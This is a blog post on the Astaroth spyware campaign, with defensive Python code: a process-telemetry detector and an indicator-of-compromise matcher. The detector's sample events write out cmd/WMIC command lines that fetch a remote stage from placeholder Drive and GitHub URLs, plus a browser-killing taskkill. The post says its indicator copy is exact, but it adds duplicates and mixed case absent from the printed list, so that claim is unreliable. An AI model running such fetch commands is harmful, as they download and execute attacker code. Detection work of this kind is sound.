The return of the Astaroth Spyware Trojan

Bitdefender researchers observed a spike in malware activity that abuses legitimate Microsoft binaries during the infection process and uses GitHub and Google Drive to deliver its payloads.

After analyzing the detection details we were able to identify this activity as a resurgence of the Astaroth spyware, a Trojan and information stealer known since late 2017.

Astaroth is classified as an information stealer and Trojan. This campaign “lives off the land”: it drives the infection through legitimate, signed Microsoft binaries (cmd.exe and WMIC), so the early stages look like ordinary system activity and slip past detections that key on unfamiliar executables.

The infection vector is a malicious archive hosted on the Internet that the victim is tricked into downloading. It contains an enticingly named .LNK file; when the victim clicks it, the shortcut runs cmd.exe with attacker-specified parameters, which in turn invokes WMIC to download the subsequent stages, pulling the parameter file from Google Drive or GitHub. Those services store and deliver the payloads, which are handed out only once certain criteria are met, such as a Brazilian locale and a Portuguese keyboard layout. Once installed, Astaroth captures keystrokes when Internet Explorer (IE) is used to access specific Brazilian banks and businesses. To make sure the victim does not use Chrome or Firefox instead, the malware terminates those browsers, forcing the user into IE.
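The chain above (explorer.exe starting cmd.exe from a clicked shortcut, WMIC fetching a stage from a remote URL, Chrome and Firefox being killed) is something a detection engineer can hunt for in process-creation telemetry. The following is an added example written for this page, not Bitdefender's or the blog author's code. The event records and their field layout are constructed for illustration. The `/format:` check relies on documented WMIC behaviour (the switch accepts a stylesheet URL, which is how WMIC can pull a remote "parameter file"); the taskkill heuristic is an assumption about how the browsers might be terminated, not something the report states.

```python
"""
Detection heuristics for the Astaroth living-off-the-land chain:
explorer.exe -> cmd.exe (clicked .LNK), WMIC fetching a remote stage,
and Chrome/Firefox being terminated to push the victim into IE.

Event records are CONSTRUCTED for this example (parent image, image,
command line); they are not real telemetry or a product's schema.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# WMIC told to render its output with a stylesheet fetched over HTTP(S).
REMOTE_FORMAT = re.compile(r'/format:\s*"?\s*(https?://[^"\s]+)', re.IGNORECASE)
# Browser image names handed to taskkill's /IM switch (ASSUMED kill method).
KILLED_BROWSER = re.compile(r"/IM\s+(chrome\.exe|firefox\.exe)", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> List[str]:
    """Return the names of every heuristic that fires for one event."""
    hits: List[str] = []
    cmd = ev.command_line

    m = REMOTE_FORMAT.search(cmd)
    if m:
        hits.append(f"wmic-remote-format:{m.group(1)}")

    # A double-clicked .LNK shows up as explorer.exe -> cmd.exe; a cmd.exe
    # launched that way which goes on to call WMIC is the described chain.
    if (_basename(ev.image) == "cmd.exe"
            and _basename(ev.parent_image) == "explorer.exe"
            and "wmic" in cmd.lower()):
        hits.append("cmd-invokes-wmic")

    if "taskkill" in cmd.lower():
        browsers = [b.lower() for b in KILLED_BROWSER.findall(cmd)]
        if browsers:
            hits.append("browser-kill:" + ",".join(browsers))
    return hits


def scan(events: List[ProcEvent]) -> List[Tuple[ProcEvent, List[str]]]:
    """Return only the events that triggered at least one heuristic."""
    flagged = []
    for ev in events:
        hits = classify(ev)
        if hits:
            flagged.append((ev, hits))
    return flagged


# Constructed sample events: two from the described chain, one browser kill,
# and two benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /V /C "set x=wmic os get /format:"https://drive.google.com/uc?export=download&id=EXAMPLE" && call %x%"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\wbem\WMIC.exe",
              r'wmic os get /format:"https://raw.githubusercontent.com/example/example/master/v.xsl"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\taskkill.exe",
              r"taskkill /F /IM chrome.exe /IM firefox.exe"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\wbem\WMIC.exe",
              r"wmic os get caption /format:list"),          # built-in local format: benign
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'"chrome.exe" --profile-directory=Default'),   # normal browser launch: benign
]

if __name__ == "__main__":
    for ev, hits in scan(SAMPLE_EVENTS):
        print(f"{_basename(ev.image):14} {'; '.join(hits)}")
```

The benign WMIC event matters as much as the malicious ones: `/format:list` and the other built-in formats are common in administrative scripts, so the rule keys on a URL argument rather than on WMIC or `/format:` alone.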

The geolocation statistics in the table below show that the campaign targets mostly users in South America, especially Brazil.

Indicators of Compromise

IP Addresses

  • 104.129.204[.]41
  • 63.251.126[.]7
  • 195.157.15[.]100
  • 173.231.184[.]59
  • 64.95.103[.]181

Domains

  • 19analiticsx00220a[.]com
  • qnccmvbrh.wilstonbrwsaq[.]pw

SHA1 File Hashes

  • 01782747C12BF06A52704A144DB59FEC41B3CB36
  • 1F83403398964D4E8B6C70B171C51CD278909172
  • CE8BDB56CCAC55C6881701EBD39DA316EE7ED18D
  • 926137A50F473BBD257CD19E207C1C9114F6B215
  • 5579E03EB1DA076EF939196CB14F8B769F30A302
  • B2734835888756929EE3FF4DCDE85080CB299D2A
  • 206352E13D601239E2D043D971EA6657C091071A
  • EAE82A63A980998F8D388BCCE7D967F28309F593
  • 9CD5A399C9320CBFB87C9D1CAD3BC366FB12E54F
  • 4CDE9A53A9A49D606BC89E74D47398A69E767056
  • F99319B1B321AE9F2D1F0361BC756A43D25444CE
  • B85C106B68ED410107F97A2CC38B7EC05353F1FA
  • 77809236FDF621ABE37B32BF073B0B893E9CE67A
  • C2F3350AC58DE900768032554C009C4A78C47CCC
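Indicator lists like the one above are published defanged (`[.]` in place of `.`) and with inconsistent hash case, and the list as printed contains repeated entries, so they need normalising before they can be matched against telemetry. The helper below is an added example, not code from Bitdefender or the blog author. Only the indicators themselves come from the page; the DNS, connection and file records it matches against are constructed for the demonstration.

```python
"""
Refang, normalise and deduplicate the published Astaroth indicators, then
match them against sample telemetry. Domain matching treats a query for a
subdomain of a listed domain as a hit.
"""
import re
from typing import Dict, List, Set, Tuple

# Indicators copied from the list above, defanged exactly as published
# (including the repeated hashes, which the parser collapses).
RAW_IOCS = """
104.129.204[.]41
63.251.126[.]7
195.157.15[.]100
173.231.184[.]59
64.95.103[.]181
19analiticsx00220a[.]com
qnccmvbrh.wilstonbrwsaq[.]pw
01782747C12Bf06A52704A144DB59FEC41B3CB36
1F83403398964D4E8B6C70B171C51CD278909172
CE8BDB56CCAC55C6881701EBD39DA316EE7ED18D
926137A50f473BBD257CD19E207C1C9114F6B215
5579E03EB1DA076EF939196CB14F8B769F30A302
B2734835888756929EE3FF4DCDE85080CB299D2A
206352E13D601239E2D043D971EA6657C091071A
EAE82A63A980998F8D388BCCE7D967F28309F593
9CD5A399C9320CBFB87C9D1CAD3BC366FB12E54F
206352E13D601239E2D043D971EA6657C091071A
4CDE9A53A9A49D606BC89E74D47398A69E767056
F99319B1B321AE9F2D1F0361BC756A43D25444CE
B85C106B68ED410107f97A2CC38b7EC05353F1FA
77809236FDF621ABE37B32BF073B0B893E9CE67A
B85C106B68ED410107f97A2CC38b7EC05353F1fA
C2F3350AC58DE900768032554C009C4A78C47CCC
"""

IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
SHA1 = re.compile(r"^[0-9a-f]{40}$")


def refang(token: str) -> str:
    """Undo common defanging: '[.]' or '(.)' -> '.', 'hxxp' -> 'http'."""
    return re.sub(r"\[\.\]|\(\.\)", ".", token).replace("hxxp", "http")


def parse_iocs(text: str) -> Dict[str, Set[str]]:
    """Classify each refanged, lower-cased line as IP, SHA-1 or domain."""
    iocs: Dict[str, Set[str]] = {"ip": set(), "domain": set(), "sha1": set()}
    for line in text.splitlines():
        tok = refang(line.strip()).lower()
        if not tok:
            continue
        if IPV4.match(tok):
            iocs["ip"].add(tok)
        elif SHA1.match(tok):
            iocs["sha1"].add(tok)
        elif "." in tok:
            iocs["domain"].add(tok)
    return iocs


def domain_hits(name: str, domains: Set[str]) -> bool:
    """True if name equals a listed domain or is a subdomain of one."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in domains)


# Constructed sample telemetry (not from the page): three should match.
SAMPLE_RECORDS = [
    {"type": "dns", "query": "qnccmvbrh.wilstonbrwsaq.pw"},
    {"type": "dns", "query": "www.19analiticsx00220a.com"},
    {"type": "dns", "query": "www.example.com"},
    {"type": "conn", "dst": "63.251.126.7", "port": 443},
    {"type": "conn", "dst": "10.0.0.5", "port": 443},
    {"type": "file", "sha1": "b85c106b68ed410107f97a2cc38b7ec05353f1fa"},
    {"type": "file", "sha1": "da39a3ee5e6b4b0d3255bfef95601890afd80709"},  # SHA-1 of an empty file
]


def match_records(records: List[dict], iocs: Dict[str, Set[str]]) -> List[Tuple[int, str]]:
    """Return (record index, matched value) for every record hitting an indicator."""
    hits: List[Tuple[int, str]] = []
    for i, rec in enumerate(records):
        if rec["type"] == "dns" and domain_hits(rec["query"], iocs["domain"]):
            hits.append((i, rec["query"]))
        elif rec["type"] == "conn" and rec["dst"] in iocs["ip"]:
            hits.append((i, rec["dst"]))
        elif rec["type"] == "file" and rec["sha1"].lower() in iocs["sha1"]:
            hits.append((i, rec["sha1"].lower()))
    return hits


if __name__ == "__main__":
    parsed = parse_iocs(RAW_IOCS)
    print({k: len(v) for k, v in parsed.items()})
    for idx, value in match_records(SAMPLE_RECORDS, parsed):
        print(f"record {idx}: {value}")
```

Lower-casing before comparison is what lets the two differently cased copies of the same hash collapse into one entry; the subdomain check is deliberately anchored on a leading dot so that an unrelated domain that merely ends with the same characters is not reported.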

Jason Davies

UK based technology professional, with an interest in computer security and telecoms.
